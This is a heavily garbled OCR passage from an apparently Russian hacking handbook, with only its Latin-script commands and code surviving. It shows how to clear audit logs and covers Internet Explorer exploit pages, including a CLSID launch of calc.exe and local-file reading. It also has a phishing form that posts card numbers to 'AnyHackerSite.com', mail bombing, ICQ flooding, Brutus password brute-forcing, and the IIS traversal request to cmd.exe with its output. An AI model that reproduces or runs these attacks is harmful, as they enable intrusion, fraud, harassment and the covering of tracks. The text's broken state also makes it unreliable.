( Rootkit - ). ,
, .

.
Tripwire (http://www.tripwiresecurity.com),
, Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].


, ,
, -
, .
, / .

Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, . :

C:\Auditpol>auditpol \\ComputerName /disable


Running...
Audit information changed successfully on \\ComputerName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled

69


System                   = No
Logon                    = No
Object Access            = No
Privilege Use            = No
Process Tracking         = Success and Failure
Policy Change            = No
Account Management       = No
Directory Service Access = No
Account Logon            = No

\\ComputerName - , /disable
. auditpol.exe - , , ,
, ( auditpol /? ).



Windows 2000/XP :
> (Start)
(Settings Control Panel).
[Fig. 4.7: Event Viewer (Local) (menus: File, Action, View, Help); log list with the columns Type, Description, Size (Application, Error Records, 512...); action "Delete all records in the log"]

Fig. 4.7. Windows


70


(Control Panel)
(Administrative Tools).
(Event Viewer).
Event Viewer ( ) (. 4.7).
(Security Log);
.
Clear all Events ( ). , . 4.8,
.

[Fig. 4.8: Event Viewer confirmation: "Do you want to save "Security" before clearing it?"; Yes, No, Cancel]

Fig. 4.8.
> (No), . .
,
- ! ,
-
. , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
, ,
Windows NT 4, Windows 2000.
.
C:\els004>elsave -s \\ComputerName -
-s , -
. , . elsave /? ,
.
, elsave.exe . - elsave.exe
Windows ( (Start), AT
MS-DOS). System, .
71

-
( , - ).
, , . , , ,

, .
- ! 50%
( - !)
- !
- , , [9]. , , Norton Personal Firewall, PGP Desktop Security .
, ,
, .

72

#
, ,
, ,
. , ,
,
, , .
, 90- , .
, , .
, , ,
.
, ,
, TCP/IP.
- ,
.
- , , .
,
.
, , , (, ).
, . ,
, , , Word ..,
, , ,
.
WWW (World Wide Web - ), Web (). Web - ,
Web . -
1961 , Web 1992 .
, , -


. Web - Web ,
, Web.
Web .
Web, Web URL (Uniform
Resource Locator - ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol - ).
, Web, HTML (Hyper Text Markup Language -
).
, ,
, - HTML CGI HTTP.
Web , , Web, , - , , - 1 Web
.
Web , , Web - HTML Web,
( browser, , , ),
Web Web-.


HTML - Web,
Web,
, , , , , , , , . , HTML
, Web, , Internet Explorer (ffi) Netscape Navigator (NN).
74

Web
: Web - , HTML Web , , ,
HTML, , - Web? -
HTML? . ( )
, , Web-.


, DoS , Web . , ,
Web,
, .
open ( ) ,
JavaScript MainPage.html
, HTML 8. 1.
8.1.
HTML Web-
<HTML>
<SCRIPT LANGUAGE="JavaScript">
generation();
function generation() {
  var d = 0;
  while (true) {
    a = new Date;
    d = a.getMilliseconds();
    window.open("MainPage.html", d, "width=250, height=250");
  }
}
</SCRIPT>
</HTML>

HTML, , . Windows 2000/XP
IE 5 IE 6 HTML,
.

75


IE 5 IE 6
.

tlep
- . , 8.2
... (
).
8.2.
HTML Web-
<HTML>
<SCRIPT language=JAVASCRIPT>
var p = external.... ;
</SCRIPT>
</HTML>
HTML 8.2 IE 5
6 var p 8.2.

( [3], [10]). , ,
-
HTML .


[3] HTML,
<OBJECT> CLSID.
8.3. HTML, .
8.3.
HTML
<HTML>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='C:\windows\system32\calc.exe'>
</OBJECT>
</HTML>
8.3 IE 6 ,
. 5.1.

76

[Fig. 5.1: Internet Explorer window with the page from listing 8.3 loaded (title bar: C:\Documents and Settings\Alex\My Documents\Work\...)]

Fig. 5.1. HTML
C:\Windows\
system32\calc.exe, , .

Web- ,
JavaScript, HTML- Web-, . ,
IFRAME, Web- .
8.4 HTML, ,
C:\security.txt.
8.4.

Web- _

<HTML>
<BODY>
C:\security.txt <BR>
<IFRAME id=I1></IFRAME>
<SCRIPT event=NavigateComplete2(b) for=I1>
alert(" :\n " + b.document.body.innerText);
</SCRIPT>
<SCRIPT>
I1.navigate("file://C:/Security.txt");
setTimeout('I1.navigate("file://C:/Security.txt")', 1000);
</SCRIPT>
</BODY>
</HTML>
8.4 IE 5 IE 6 , . 5.2.

File

Edit

View

Favorite*

Tools

Help

QMd.-0-

C:\security.txt

. 5.2,

security.txt -
-
Web-.
,
,
, JavaScript . 5.2. Web-
.

Web-
NavigateComplete2, [3].

Web-caumo&
Web, , , - Web- . ,
Web- ActiveX, .
,
,
, , , , -,
- ..
- , ,
. ,
- .
- ,
- Web-,
. ,
,
.
, Web - . , Windows
Web- Microsoft NetBus.
Web-, . Web , . 8.7 HTML, -.
8.7.
HTML
<HTML>
<HEAD>
<TITLE> Bubliki&Baranki !!!!!</TITLE>
</HEAD>
<BODY>
<SCRIPT TYPE="text/javascript">
function falsify() {
    // open a new window whose address bar reads as a Bubliki&Baranki page
    z = window.open("about:Internet- Bubliki&Baranki ");
    z.document.open();
    // the spoofed order form posts to the attacker's own CGI script
    z.document.write("<TITLE> Bubliki&Baranki</TITLE><H1>Заказ VirtualAir</H1><FORM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber' METHOD=post>Укажите <BR><INPUT TYPE=text><BR>Укажите <BR><INPUT TYPE=text><BR>Укажите карточки<BR><INPUT TYPE=text><BR><INPUT TYPE=checkbox VALUE=OK>и VirtualAir<P><INPUT TYPE=submit VALUE=''></FORM>");
    z.document.close();
}
</SCRIPT>
<H1 ID="header"> VirtualAir</H1>
Bubliki&Baranki VirtualAir,
! <A HREF="javascript:var a;" onclick="falsify()"
   onMouseOver="window.status='http://www.Bubliki&Baranki.com'; return true;"
   onMouseOut="window.status=''; return true;">
</A> Bubliki&Baranki!
</BODY>
</HTML>

8.7 IE 5 , . 5.3.
- http://www.Bubliki&Baranki.com

Rog&Kopito
.
Web-
Rog&Kopito
Bubliki&Baranki,
Web-
Rog&Kopito .
(, ,

.)
,

Web- Bubliki&Baranki.

Web, . 5.4.
Web-
. 5.4


.
. 5.3. Web-
Rog&Kopito
. 5.4. /-
VirtualAir Bubliki&Baranki

CGI- GetCardNumber,
Web-, Rog&Kopito:
<FORM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber' METHOD=post>
-
(Address) ,
,
, , .
IE Address Javascript.
URL HTML IE 6, ; , IE 6 HTML
. !
, ,
Web- - . , ,
, .


, , ,
, Web . .
, , , Web.
,
Web-
. . -, , ,



, .
.
, ,
.
- Web-, -
, .
:
. , ,
SSL.
Web-
.
.
, , ,
. .
, . , , ,
, . .

Web - .
,
. , , , , Web . ,
- Web
, , - , , .
, ,
4 IE Netscape, , 5 6 .
, ,
.

6.


, ,
, ,
, .


, . , , .
, ,
,
, ,
... , - !

- (, , , 1,
). ,
,
,
! ,
. ? -
-
- .
( Flood - ,
) ( Spam - , . Spam ). (..
), , ,
.
, -


SMTP-. Death & Destruction
Email Bomber ( & ) 4.0,
DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
, . ,
DnD, .
Avalanche - Avalanche
DnD, .
. 6.1 DnD 4.O.

Puc. 6.1. DnD


DnD, , 1-1.
, ( ).
.
.

DnD Settings
(), DnD (. . 6.1).
DnD Settings ()
:
> SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net.
> Spoof Host ( )
, .
, .
Randomly Change ( ) ,

SMTP-.
>
SMTP-,
Edit Server List ( ). Random
Server List ( ), . 6.2.

Puc. 6.2.
SMTP-

SMTP-
Random Server List ( ) .
Submit ().
Size of Bomb ( ) (. 6.1)
:
# of messages to send ( )
.
10.
Never ending bomb ( ) .



Puc. 6.5. MIME

13
, DnD , . , ,
.
, Clone ()
E-Mail bomb ( ) Bomber Spawn 1 (
), . 6.6.
Puc. 6.6.


, Bomber Spawn 1 ( ) E-Mail bomb ( )
-
SMTP-. ,
SMTP-. - - , !
- .
, , ( - ).
> , DnD Clones Load Multi Clones ( * ). Number of clones (
), . 6.7
Puc. 6.7.
- !
> Number of clones ( ) ( 5-6) .
Bomber Spawn
( ), 1 -
. Send Bomb ( )
. -
!

&&
! , - ,


! DnD
, , Mailing lists ( ). Subscribe
joe lamer to mailing list ( ),
. 6.8, ,
Euro Queer ( ), Mormons (), Family Medicine
( ) -
!
Puc. 6.8. DnD


DnD
. Target
Email Address ( ), Subscribe em
() - . , .


,
, DnD , ,
, . ,
Extras Pword generator ( * ).
Randomic Password Generator ( ), . 6.9.
, How many characters? (
?) ( - 8 )
: Use Both ( ) - , Use numbers ( ) - , Use letters ( ) - .

.

Extras ()
- . 6.9.
SMTP- (
SMTP Remote ( SMTP)),
( Raw Port ( )).
, ( , SMTP). Other Tools
( ) . - , ,
.
, - ;
. ,
, . , ( ). , .




. , ,
- (
IMAP) , .
- .
Brutus Authentication Engine Test 2
( Brutas , 2),
Brutus AET2 (http://www.hobie.net/brutus). . 6.10
Brutus,
, FTP, HTTP, Telnet
NetBus.
Puc. 6.10. Brutus

,
Brutus ( 8
Brutus IIS). , alex-1 .sword.net,
kolia. , ,
- ,
.
.
> Brutus - 2 (. 6.10) Target () , alex-1.sword.net.
> () ,
.
> Connection Options ( ) Use Proxy ( ),
-
.
> Authentication Options ( ) Single User ( ) -
.



User file ( ) , .. - kolia.
> Pass Mode ( ) Brute Force
( ). Brutus ,
. 6.11.

Puc. 6.11. Brutus POPS


Range
(). Range () Brutus - Brute
Force Generation (Brutus - ), . 6.12.
Puc. 6.12.



Brutus - Brute Force Generation (Brutus -
) - ,
, . ,
- , Min Length ( ) 3, Max Length ( ) - 4. , Digits only
( ).
.
> Start () Brutus - 2
Brutus - 2. . 6.13.
Puc. 6.13. 1.
Positive Authentication Results (
) , kolia - 0007.
, Brutus 10997 alex-1.sword.net (
11000). 5 Pentium 3
1000 ,
Ethernet 10 /.
,
, Brutus (



). -, , , ( 8 !),
, (, &$ ..).
!
Brutus - Brute Force Generation (Brutus - ) 8 ,
Full Keyspace ( ). Start
() Brutus - 2
- 6 095 689 385 410 816 - , !
12 ?
, , ,
(., , [10]). Brutus,
Pass
Mode ( ).
( 100 000), ,
. , password, parol, MyPassword
- Web- -
.
-,
,
, Ethernet, 30-50 / (
). -
. -
, - , ,
,
.

. , , , ,
, . .

- , .



IIS Brutus 8 , - . ,
, . , , ,
- , -
! :
!. .


, , ,
. 1, , , , . - ,
, , ,
. ,
- ( - ),
.
, - ,
. . ,
TFTP 1-1 , 1-1 . , TFTP
, .
TFTP
, ,
, . , , , ,
,
.

. , ,


( ) . ,
, , Web- - .. ( ,
). . - , , , -.
. - , ..
,
- , ,
. , ..
, -
-
. , 2002 ., , ,
.
Web-. . . ...
(
). Web-, ,
?, .
, , ?, ?,
? . -
, ,
, ,
. , , , , ,
. ,
, - ,
,
repa_parenaia, - !

- . , , ,
,
.


- , , ,
- , . .
, - .
,

. , (
) , -
!
.
,
8 ( 12) , , .
,
DnD .
.
, - , Norton Antivirus
MacAfee VirusScan.
,
- PGP Desktop Security.
, .
, - , ,
, .

- - , .


7.

ICQ
ICQ Intelligent Call Query, .
ICQ [--] : I Seek You - ; ,
ICQ . ICQ
,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, . , , ICQ,
,
. , , - .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mira-bilis.com. ICQ - ICQ , , 1998,1999, 2000,
2002, ICQ 2003. ICQ
UDP, 4000, -
TCP, .
, ICQ, UIN (Unique Identification Number -
). UTN -
ICQ , .
, ICQ?
ICQ ,

. , ? .

-,
ICQ,
. -, ICQ ICQ
.
, ICQ, :
, UIN ,
, . , ICQ , - ICQ . , , - .
ICQ-, , IP-
ICQ-, , . , , DoS, 9 . ,
IP- ICQ, -
, ICQ- .
!
, ICQ-,
. ,
,
, - ,
.
ICQ,
Mirabilis
. ICQ, ICQ , .
,
.



ICQ
. - ,
ICQ
ICQ ICQ. ,
ICQ ; , ICQ- (,
LameToy
www.mirabilis.com). , ( )
,
.
,
, ,
, ,
.

, ICQ. .
. Sword-2000
ICQ Groupware Server, Alex-
ICQ Groupware Client, UESf, 1001, 1-1 ,
UIN, 1003. ICQ Groupware
http://www.icq.com.
ICQ, ICQ
Groupware, ,
, 1. - , ICQ - ,
ICQ
. ICQ
ICQ-,
ICQ-, ICQ- .


UIN ICQ- UIN ICQ, , UIN . UIN



. ,
, - .
- - , .
, , .
( ) LameToy for ICQ
(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .
LameToy for ICQ.
. 7.1 , LameToy for ICQ.
Puc. 7.1. LameToy for ICQ (DBKILLER)


ICQ

LameToy for ICQ (DBKILLER) -
Send (). , Setting
() Loop () ,
. UIN,
UIN# - Ran (Random - ). ,
, , , .
, ICQ-,
- , UIN UIN
. , ICQ (ICQ99a
ICQ99b) . DB-
( - ), DB Data Base - , ,
DB NewDB. LameToy ,
DB killer ( DB)
Setting ().
ICQ, .
, , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker
.

lf~ac)peca ICQ-
DoS ( ) ,
- . ,
, , Advanced ICQ IP
Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml).
. 7.2 Advanced ICQ IP Sniffer.

Puc. 7.2. - IP- ICQ



IP- ICQ UIN, Advanced ICQ IP
Sniffer ICQ, UIN . , , Your UIN ( UIN) Password
() Advanced ICQ IP Sniffer (
ICQ). Check ()
, ICQ
UTN , Info
() .
, Info () . 7.2
, ( ) IP- ICQ,
TCP-, ICQ . , , Ext IP ( ), Int
IP ( IP) TCP Port ( TCP). ,
ICQ- ( ).
ICQ, Advanced IP ICQ Sniffer,
ICQ server's address and port (
ICQ), Server () . 7.3.

. 7..
ICQ server's address and port
( ICQ)

ICQ server's address and port ( ICQ)


Mirabilis ICQ 4000. , / IP- / .

ICQ, , , ICQ-,

ICQ- ICQ. ,
,
.
, ICQ, ICQ-MultiWar
(http://www.paybackproductions.com/), - ICQ Flooder
(. 7.4).

Puc. 7.4. ICQ


ICQ Flooder, .
> Victim's address ( ) IP-
ICQ.
> ICQ-port ( ICQ) TCP.
> , UIN .
:
UTN - Randomly generated UIN
( UIN), UIN UIN.
UIN - Apparent source UIN
( UIN ) UIN, ICQ .
> No. of Messages ( ) ICQ-.
> Message () (- , ).
> Send! () .
- , ICQ, , - , ,


http://mht.hut.ru/icq/icq.html,
( , , ICQ , ). ICQ - ,
, , -
!

ICQ
ICQ,
ICQ, ,
. ,
, .
, , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.
Puc. 7.5. ICQ subMachineGun


U1N ICQ

brute
force - , ,
.

.
ICQ ICQ subMachineGun
.
>

ICQ subMachineGun.

> Settings * Connections&Cracking (&). , . 7.6.


Puc. 7.6. U1N


icq server ( ICQ) ICQ,
, ICQLmirabilis.server.
port () 4000.
Cracking ()
:
Stop if successful ( )
ICQ.
Make log if cracked uins ( UIN) ICQ.


Reconnect if timeout (
) ICQ
.
Cut password length to 8 digits (
8- ) 8- .
> set timeout ( ) 15 .
> relogin ( ) ICQ
3.
ICQ subMachineGun
UIN . .
> ICQ subMachineGun Bruteforce
( ) UIN. .
Single
() UIN,
.
Single
() UIN.
UIN,
(...) Making victims list ( ), . 7.7.
Making victims list (
) Range () ,
, UIN ( - 100000)
( 900900).

I Hint: use Del to remove uins from list

Puc. 7.7.
UIN

step () UIN ( - 100).


Generate () UIN;
.

, Generate ()
- UIN, , , ..
Add () UIN .
> UIN,
Open () UIN ( UIN ).
> - UIN ,
t0*"!. Clear () UIN ( ).
UIN, .
.
> ICQ subMachineGun Bruteforce ( )
. .
Single () , .
Single () .
> ,
(...) Make passlist
( ),
. 7.8.
Make passlist ( )

.
> Open () (
).
- ,
ICQ.

Puc. 7.8.

v Generator ()
Add (). , .


> , 0
*"**]. Clear ()
( ).
> , .
.
Force (). , ICQ
subMachineGun v1.4 (. 7.9).
Puc. 7.9. -

ICQ subMachineGun v1.4,
UIN, ( , . 7.9 ). ,
, 15 ,
ICQ.
- 45 ,
( ). ,
, , , , .. - .
...

(
-, , ICQ -
. ICQ , ICQ . ,
? - ! ,
? ,
ICQ- , .
,
.
? ,
Windows.

, . ,
ICQ ,
ICQ.
ICQ-, ,
ElcomSoft Advanced ICQ Password Recovery
(http://www.elcomsoft.com).
, .
. 7.10 Advanced ICQ Password
Recovery.

31.01.2003 2:05 - ACQPR1.0 launched, registered version

6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L

Puc. 7.10. ICQ .dat


ICQ, Advanced ICQ Password Recovery (
ICQ) .dat, ICQ.



, , ICQ
2002 2002.
2002 , UIN .dat,
.., , 207685174.dat
(207685174 - UIN ).
ICQ Password successfully found! ( ICQ ), (. 7.11).

ICQ Password successfully found !


ICQ version:
99b-2000b
UIN password:

% Copy to Clipboard

fij Close

Puc. 7.11.
!

. 7.11,
ICQ 99b - 2000b, ICQ 2002 ( ).
, ICQ
, - , - ICQ-. - , , (. [11]), Web- (. 8). ,
, ,
.


, ICQ
( ) , . , ,
,
ICQ. , ,
ICQ - ,
- . , .
ICQ,
.
. , , ICQ- - ICQ . ,
ICQ , UIN . -

?
, , , - ,
. , , - , , , ,
, , - . ICQ - , , ,
,
, , , , .
- ,
.. ICQ, , ,
. ,
ICQ ICQ,
ICQ (
, ICQ Team
(http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ.

- , .
, ? ,
, . ,
- , ? , ... ,
, , .
ICQ-, -

,
.

ICQ , . ICQ - ,



ICQ-.
ICQ DoS ...
.
ICQ
. -, ,
ICQ-, ICQ-, ICQ- .
ICQ,

ICQ. IP- , ,
ICQ. ICQ .
, ICQ-, UTN
. , ICQ-, -, , BlacklCE Defender,
DoS. -
, , .
,
. ,
ICQ -
.
-, -
ICQ, ICQ. , IP- ICQ-,
- . ,
.
, . ICQ , PGP Desktop Security 2.9,
ICQ-
. ,

PGP- ( [7]).


8.

Web-caumoft
Web? , Web
,
. Web-
, Web- .
, , , .
, Web-
, ,
, , .
HTML Web-
( - ),
, . HTML
.

(
).
, Web-, , Web-,
, . HTTP, , , .
Web-,
, .
, Web-, DoS
,
, Yahoo.
,
Web-, , ( ) Web- ,
. Web , .

Web~cauma
Web
Web , , Web, Web,



, .

Web - Web, Web . Web - , Web, Web . Web


, .
Web - Web,
, Internet Explorer (ffi), -
HTML Web-, HTTP,
Web.
Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation
. Web,
ASP (Active Server Page - ) CGI,
, Java SUN,
Apache Software Foundation .
Web, Web,
, . SQL Microsoft, Oracle Oracle .
, , , -
ODBC (Open Data Base Connectivity -
).
- , , , , , ... ?

1 Web~cauma
,
Web-,
. ,
.

Web- - ,
, , , , Web .
Web- - Web- ,
, TCP- 80, , Web-,
( CVE, Web-), Web- - .
Web - - ASP, Java, CGI -
, .
Web - , -,
, -, ( !).
, , - . , , (cookie),
, .
- Web-
, , . , , CGI- , -
CGI- , , , .
- ,
Web- , .
- , Web-
, ,
, -
.
- , , ,
Web-, Web-, .
, (, . []).
, , , , IIS 5. ,


(
HTTP), CGI- (
) Web
( Web).

Web- , .
IIS , Web-,
. , Web- ,
- , .
- , Web-. - . , FTP- , , .
, .
Web- .

Web~cauma
,
Web-,
. , , ,
, . , , .
, Web- , - , , DNS-,
.
Web.
,
.


cbp
Web-
.
.
-, ,
- ,
. IP-, , ,
.
Whols .
-, HTML- Web- . HTML , Web, , .
, , , , JavaScript . , HTML- Web
Web- Teleport Pro.
, , Whols - , ,
Web.
whois (
Unix), Web- , whois Web-.

Whols
. , ,
. 1999
- Network Solution (http://www.networksolution.com),
, , InterNic (http://www.internic.net). / .
Web-,
Whois ( ),
. Whois
, ,



, DNS
. ,
RIPE NCC (Network Coordinate Center - ),
IP-
. Web- RIPE NCC (http://www.ripe.net),
. 8.1.
. 8.1. Web- RIPE NCC


IP- Web-
? - -
DNS - .


,
SuperScan (http://www.foundstone.com),
. 8.2.
SuperScan, .
> Start () - .
> Stop () .
> Scan type ( )
All list ports from ( ).
> Start ().

. 8.2.

SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. (
),
.

. 8.. IIS 5


Legion (http://packetstormsecurity.org/
groups/rhinoS),
- 1.0.0.1 . 8.3.
, - IIS 5,
- , ? .

| II5
IIS ,
HTTP (Hypertext Transfer Protocol - ) CGI (Common Gateway Interface - ), IIS, .
HTTP , , [12], - Web . HTTP ,
GET. Web-
(, ),

GET,

,
,
http://www.anyserver.com/documents/order.html.
order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , , [12],
.
HTTP, :
http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2
MyScript - , /scripts IIS, a
?1+2 ,
MyScript. IIS ,
, ,
.
CGI, ASP
(Active Server Pages - ) ISAPI (Internet Server
Programming Interface - ). ASP :
http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2=
2

MyScript.asp, , , HTML. ISAPI
, ISAPI. HTTP:
http://www.anysite.com/isapi.111?1&2
, IIS, , .

HTTP ,
IIS . IIS 2.0 :

http://www.anysite.com/.7.7.7.7.7winnt/secret.file
Web- , secret.txt.
- Windows, ACL.
IIS , Web-
[3]. IIS
, , , , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS,
netcat (http://www.atstake.com), (netcat - - [3] netcat IIS).
netcat Sword-2000
,
. netcat .
> Alex- netcat,
nc -vv 1.0.0.1 80.
v
GET / HTTP/1.0 . . 8.4.
GET / HTTP/1.0
IIS. . 8.4, HTML,
.



c:\test\netcat>nc -vv 1.0.0.1 80
DNS fwd/rev mismatch: SWORD-2000 != sword-2000.sword.net
SWORD-2000 [1.0.0.1] 80 (http) open
GET / HTTP/1.0
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 28 Feb 2003 12:55:40 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter
</html>sent 17, rcvd 224: NOTSOCK
C:\test\netcat>
Puc. 8.4. GET IIS netcat


, GET <.
GET.txt :
GET / HTTP/1.0
[CRLF]
[CRLF]
[CRLF] . netcat .
nc -vv 1.0.0.1 80 < get.txt

get.txt, . 8.4.
( .)
, . ddcode.txt .
GET /scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
[CRLF]
[CRLF]
1-1 Windows
2000 ( ).
netcat :
nc -vv 1.0.0.7 80 < ddcode.txt
. 8.5.

C:\test\netcat>nc -vv 1.0.0.7 80 < ddcode.txt
DNS fwd/rev mismatch: ALEX-1 != alex-1.sword.net
ALEX-1 [1.0.0.7] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 01 Mar 2003 07:16:42 GMT
[directory listing of the C:\ drive of ALEX-1 follows in the screenshot]
sent 713: NOTSOCK
C:\test\netcat>

. 8.5. 1-1 !
, 1-1
! Sword-2000 ( Windows 2000 Advanced
Server Service Pack 2) - Microsoft ,
2000 . ,
URL ,
(. [3], [4], [11]).
, Windows 2000 ?
- ,
? ,
.


Web-, IIS, -
, Web-.
, Web- CGI (Common Gateway Interface - ), , Web .
CGI, , .
Web-,
.., IIS, System, . .



, CGI- , , . , -
, ,
,

. , - .
, , Perl, , ., , , ,
,
, ,

. - , - , ,
Web, -
.
, ,

CGI-, , READY
Web-, Puc. 8.6. CGl-
D@MNED CGI Scanner 2.1

.
CGI-
D@MNED
CGI
Scanner
2.1
(http://shieldandsword.narod.ru/soft/scansec/
scansec.htm). . 8.6 ,
.
, D@MNED CGI Scanner 2.1.
Scanners log ( )
. , , , .
Scan list ( ), . 8.7, , .
,
, .
-

. , ,
.
, .
Scan subnet ( ) -, . , : 234.56.78.1 - 8.
CGI holes ( CGI) (. 8.8) CGI-,
.
, ,
,
Scan list ( ).
. 8.7.
. 8.8. CGI-
. 8.9. CGI- !
. 8.10. CGI-



Spy () (. 8.9),
Web- ( - IIS 5.0),
( ).
Option (), . 8.10,
-, . - -
- -,
- ( , ...).
D@MNED CGI Scanner 2.1 .
1-1
IP- 1.0.0.7, .
> Scan list ( )
http://www.altavista.com IP- 1.0.0.7.
> Scanner log ( ) . ,
. 8.11.
.
( . 8.11 200
500) ;
. ,
200
- , 500 - .

200 (
- SUCCESS)
.

. 8.11.
,
IIS 5.0
D@MNED CGI Scanner 2.1
.
, , .
, 1, , MITRE CVE (http://www.mitre.org). ,
. 8.11, IIS .htr .idq.; MITRE.
CVE-2001-0500

Buffer overflow in ISAPI extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary
commands via a long argument to Internet Data Administration (.ida) and
Internet Data Query (.idq) files such as default.ida, as commonly exploited by
Code Red.
( ISAPI (idq.dll) Index Server 2.0 Indexing Service 2000 IIS 6.0 -
.ida (Internet Data Administration -
) .idq (Internet Data Query - ),
, default.ida, Code Red.)
Reference: BUGTRAQ:20010618 All versions of Microsoft Internet Information Services, Remote buffer overflow (SYSTEM Level Access)
Reference: MS:MS01-033
Reference: CERT:CA-2001-13
Reference: BID:2880
Reference: XF:iis-isapi-idq-bo(6705)
Reference: CIAC:L-098
, CGI- IIS
- IIS. , ,
http://www.securitylab.ru. ,
, .
" IIS .htr
, Web . "" , .htr (ISM.DLL).
IIS 4.0 5.0 SP2 1 2002.
IIS - , , . ISAPI , .htr , ISM.DLL.
ISM.DLL . IWAM_COMPUTERNAME.
. IIS 4.0-5.1."



, SecurityLab.ru Unix Pyton, . ,
, ( ,
).
CGI Vulnerability Scan (http://www.wangproducts.co.uk),
. 8.12.

Puc. 8.12. CGI Vulnerability Scan



CGI-, , - .
, , SecurityLab.ru
(http://www.securitylab.ru), IIS ( ),
IIS.
, , HTTP - . -

Web-? - HTML- Web-, . HTML,
Web, HTML .
Web . , , Teleport Pro (http://www.ten-max.com),

Web .
Teleport Pro.

Web'cnsuc)ep*feLeport fro
Teleport Pro Web-, Web- . Teleport Pro , ( ), , Web Web-.
, ,
- spider - .
Web-
Web - . , , , . Teleport Pro .
Web-
.
Web-, .
Web- .
Web-.
Web-, Web-.
Web- .
Web-.
Teleport Pro , Web ,
.
Teleport Pro , , Web.
, , Web.
Start () - , Teleport Pro ,


Web, Web-, , .

Web
. , Teleport Pro Web
, .
Web- , Web, .
Teleport Pro . 8.13.

. 8.13. Teleport Pro Windows


Teleport Pro
,
.


.
> Teleport Pro File New Project Wizard
( ). (. 8.14).
. 8.14
Teleport Pro.
Create a browsable copy of website on my hard drive - Web- .

. 8.14.
Teleport Pro
Duplicate a website, including directory structure - Web-,
.
Search a website for files of certain type - Web- .
Explore every site linked from a central site - ,
.
Retrieve one or more files at known addresses -
.
Search a website for keyword - Web- .
. 8.15.
Web


- Web . , Next
(). (. 8.15).
*

,
. , ,
Teleport Pro 1.29.1959 HTTP FTP.

Web;
, New Address ( )
.
Up to ... links from this starting point ( ...
) Web , ( 3).
Next ()
(. 8.16).

Puc. 8.16.
. 8.16 , Web
. :
Just text ( ) - .
Text and graphics ( ) -
.

Text, graphics, and sound (, ) , .
Everything () - .
, , Account ( ) , Password
() - .
Next ()
(. 8.17).

Puc. 8.17. !
. 8.17 ,
Start ()
Start () Project ().
> Finish () (. 8.18) .
Puc. 8.18. Teleport Pro





Project
Properties ( ), . 8.19
Project * Project Properties ( * ).
Puc. 8.19.

Project Properties ( ) , .
, Browsing/Mirroring (/ ), . 8.19.
Browsing/Mirroring (/ )
,
, ,
,
. .
Always save HTML pages ( HTML) Teleport Pro HTML, .. Web-,
, ,
Web, . , Web-
, ,
Web- .htm .html.
Replicate the directory structure of remote servers (
) , .
,
, .
Use MSIE-compatible filenames (append .htm to HTML files where
necessary) ( , MSEE (
.htm HTML)) IE ,
HTML, .htm .html (, .shtml .pi). ,
, Teleport Pro
HTML, .htm .html,
.
Linkage System ( ) , , ,
. Localize links for all retrieved files
( ) ,
, Web.
:
Link to a message that explains why the file was not retrieved -
, , . , ,
, .
Link to the Internet address for the file - .
,
.
Link to a place where the local file will be stored - ,
, ..
Web .
Web- , .
Teleport Pro
HTML- , , , , Java, . , -
.



Linkage System (
) Link using 8.3 filenames (, 8.3) , DOS . , ,
8.3.
Relink all files in the project now ( )
HTML
, .


, , , Web-. HTML
Web-? , Web- , ,
Web-. , Web* HTML.
?
-, - ,
. , , , - ,
. , - .
-, - , , - , , . , , , Web-
CGI. HTML CGI-,
.

, . ,
. , -
.
, ,
, , Web , ,
Retina (http://www.eeye.com/html/Products/Retina/). ,
Teleport Pro (http://www.tenmax.com)
HTML-
, Web.


, Web ? ,
Web, ,
- . HTML, HTTP.
, , .
Web-,
.
- ,
Web- ,
/ Administrator/password
( , , [3] , (!!!)
Web).
, , Brutus Authentication Engine Test 2 ( 2), Brutus AET2 (http://www.hobie.net/brutus), , .
, HTTP.
. 8.20 Brutus.

. 8.20. Web-


IIS
Sword-2000, .
> Target () IP- , 1.0.0.1.
> ()
, . HTTP (Basic
Authentication) (HTTP ( )) -
HTTP, ( IIS
Windows IIS).
Authentication Options ( ) , . Administrator,
Use Username ( ),
Single User ( ).
> Pass Mode ( ) Brute
Force ( ), , .. .
> Range (). Brutus - Brute Force Generation (Brutus - ), . 8.21.
Brutus - Brute Force Generation (Brutus - ) - - , IIS - . ; Min Length ( ), Max Length ( ) - 3.
Puc. 8.21.
, Digits only ( ).
.
> Start () Brutus - 2 (. 8.20) . Brutus - 2 . 8.22.

Puc. 8.22. IIS !


, IIS , . 8.23, ,
.

Puc. 8.23. Web


, Brutus , Web. CGI- Web-. () HTTP
(Form) (HTTP ()) GET ,



, ,
, .

Web, , - . Web
, . , , . , Windows NT/95/98,
Web- CGI Vulnerability
Scan D@MNED CGI Scanner 2.1, ,
, Web, ,
.
, Web-, , ,
. Web - ,
Web- .
, Web- - , Retina, , , [7]. Web- -
